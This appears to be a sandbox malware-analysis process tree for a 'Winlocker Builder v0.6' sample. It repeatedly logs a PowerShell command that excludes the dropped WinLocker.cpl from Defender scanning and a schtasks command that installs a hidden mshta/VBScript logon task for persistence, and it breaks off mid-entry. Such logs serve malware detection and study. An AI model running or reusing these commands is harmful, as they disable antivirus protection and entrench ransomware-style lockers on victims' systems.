        Suspicious use of AdjustPrivilegeToken
        
        PID:3488
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3704
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        12⤵
        
        PID:336
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3784
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        11⤵
        
        PID:2380
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        12⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4956
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3560
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        13⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        12⤵
        
        PID:3360
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        13⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3428
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        14⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        12⤵
        Blocklisted process makes network request
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4448
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        13⤵
        
        PID:828
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        14⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4832
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        15⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        13⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:556
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        14⤵
        
        PID:2600
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        15⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        16⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:228
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3884
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        16⤵
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        14⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3704
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        15⤵
        
        PID:2904
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        16⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1292
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2216
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        17⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        15⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2816
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        16⤵
        
        PID:5096
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        17⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2948
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1836
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        18⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        16⤵
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        17⤵
        
        PID:4268
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        18⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3852
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4860
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        19⤵
        
        PID:1584
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        17⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1388
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        18⤵
        
        PID:4192
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        19⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2072
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        20⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        18⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4956
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        19⤵
        
        PID:832
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        20⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        21⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3888
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5080
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        21⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        19⤵
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3428
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        20⤵
        
        PID:4964
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        21⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        22⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1580
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        22⤵
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        20⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        21⤵
        
        PID:4288
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        22⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:2308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1892
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2700
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        23⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        21⤵
        
        PID:2776
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        22⤵
        
        PID:1912
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        23⤵
        Modifies visiblity of hidden/system files in Explorer
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:1420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3600
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2800
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        24⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        22⤵
        
        PID:1896
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        23⤵
        
        PID:4468
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        24⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:3836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4384
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1980
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        25⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        23⤵
        
        PID:2816
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        24⤵
        
        PID:5000
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        25⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4488
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        26⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3264
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        26⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        24⤵
        Modifies registry class
        
        PID:4724
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        25⤵
        
        PID:988
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        26⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:3560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4840
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2756
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        27⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        25⤵
        
        PID:684
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        26⤵
        
        PID:4072
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        27⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:784
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3200
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        28⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        26⤵
        
        PID:4636
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        27⤵
        
        PID:1308
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        28⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:4032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3744
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        29⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3432
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        29⤵
        
        PID:856
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        27⤵
        
        PID:2108
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        28⤵
        
        PID:5112
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        29⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:948
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        30⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2920
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        30⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        28⤵
        Modifies registry class
        
        PID:1004
        
        C:\Windows\System32\control.exe
        
